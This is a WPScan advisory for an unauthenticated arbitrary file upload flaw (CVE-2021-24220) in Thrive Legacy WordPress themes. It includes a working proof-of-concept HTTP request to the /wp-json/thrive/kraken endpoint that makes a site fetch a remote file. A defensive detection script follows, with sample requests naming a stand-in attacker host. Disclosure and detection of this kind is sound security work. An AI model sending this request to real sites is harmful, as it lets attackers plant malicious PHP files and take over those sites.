WPScan

Themes Vulnerabilities

All Thrive Themes Legacy Themes < 2.0.0 - Unauthenticated Arbitrary File Upload and Option Deletion

Description

Thrive “Legacy” themes register a REST API endpoint that compresses images through the Kraken image optimization engine. The endpoint trusts the kraked_url values in the request body and fetches the file at each one. By sending a crafted request, combined with data inserted through the separate Option Update vulnerability, an unauthenticated attacker could make the endpoint retrieve malicious code from a remote URL and either overwrite an existing file on the site with it or create a new file. This includes executable PHP files containing malicious code.

Proof of Concept

POST /wp-json/thrive/kraken HTTP/1.1
Host: [URL]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 104

{"id":"td_optin_webhook","results":{"http:\/\/key":{"kraked_url":"https:\/\/ramgall.com\/license.txt"}}} 
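The request above is the indicator defenders can hunt for: a POST to /wp-json/thrive/kraken whose kraked_url does not point at the optimizer and is not an image. The following detection helper is an added example, not WPScan's or Wordfence's code; the allow-listed host optimizer.example, the host attacker.example and the sample requests are constructed placeholders.

```python
import json
from urllib.parse import urlsplit

ENDPOINT = "/wp-json/thrive/kraken"
IMAGE_SUFFIXES = (".jpg", ".jpeg", ".png", ".gif", ".webp")
# Assumed allow-list: the host the legitimate optimizer serves compressed files from.
TRUSTED_HOSTS = frozenset({"optimizer.example"})

def kraked_urls(body):
    """Return every kraked_url string in a Kraken-style {"results": {...}} body,
    or None when the body is not JSON at all."""
    try:
        data = json.loads(body)
    except ValueError:
        return None
    results = data.get("results") if isinstance(data, dict) else None
    if not isinstance(results, dict):
        return []
    return [entry["kraked_url"] for entry in results.values()
            if isinstance(entry, dict) and isinstance(entry.get("kraked_url"), str)]

def review_request(method, path, body, trusted_hosts=TRUSTED_HOSTS):
    """List the reasons a request looks like CVE-2021-24220 abuse; [] means clean."""
    if method != "POST" or path.split("?", 1)[0] != ENDPOINT:
        return []                       # not the vulnerable endpoint
    urls = kraked_urls(body)
    if urls is None:
        return ["body is not JSON"]
    reasons = []
    for url in urls:
        parts = urlsplit(url)
        if parts.hostname not in trusted_hosts:
            reasons.append(f"kraked_url host not allow-listed: {parts.hostname}")
        if not parts.path.lower().endswith(IMAGE_SUFFIXES):
            reasons.append(f"kraked_url is not an image: {parts.path}")
    return reasons

# Constructed sample requests (method, path, body); the first mirrors the PoC shape.
SAMPLE_REQUESTS = [
    ("POST", ENDPOINT, '{"id":"td_optin_webhook","results":{"http:\\/\\/key":'
                       '{"kraked_url":"https:\\/\\/attacker.example\\/license.txt"}}}'),
    ("POST", ENDPOINT, '{"id":"img_42","results":{"https://site.example/a.jpg":'
                       '{"kraked_url":"https://optimizer.example/out/a.jpg"}}}'),
    ("GET", "/wp-json/wp/v2/posts", ""),
    ("POST", ENDPOINT, "not json"),
]

def scan(requests=SAMPLE_REQUESTS):
    """Map index of each flagged request to its reasons."""
    return {i: r for i, (m, p, b) in enumerate(requests) if (r := review_request(m, p, b))}

if __name__ == "__main__":
    for i, reasons in scan().items():
        print(i, reasons)
```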

Affects Themes

rise (fixed in version 2.0.0)
luxe (fixed in version 2.0.0)
minus (fixed in version 2.0.0)
ignition (fixed in version 2.0.0)
focusblog (fixed in version 2.0.0)
squared (fixed in version 2.0.0)
voice (fixed in version 2.0.0)
performag (fixed in version 2.0.0)
pressive (fixed in version 2.0.0)
storied (fixed in version 2.0.0)

References

CVE: CVE-2021-24220
URL: https://www.wordfence.com/blog/2021/03/recently-patched-vulnerability-in-thrive-themes-actively-exploited-in-the-wild

Classification

Type: UPLOAD
CWE: CWE-434

Miscellaneous

Original Researcher: Chloe Chamberland, Ram Gall, Charles Sweethill
Submitter: Chloe Chamberland, Ram Gall, Charles Sweethill
Submitter website: https://www.wordfence.com
Submitter twitter: wordfence
Verified: Yes
WPVDB ID: a2424354-2639-4f53-a24f-afc11f6c4cac

Timeline

Publicly Published: 2021-03-24
Added: 2021-03-24
Last Updated: 2021-03-31
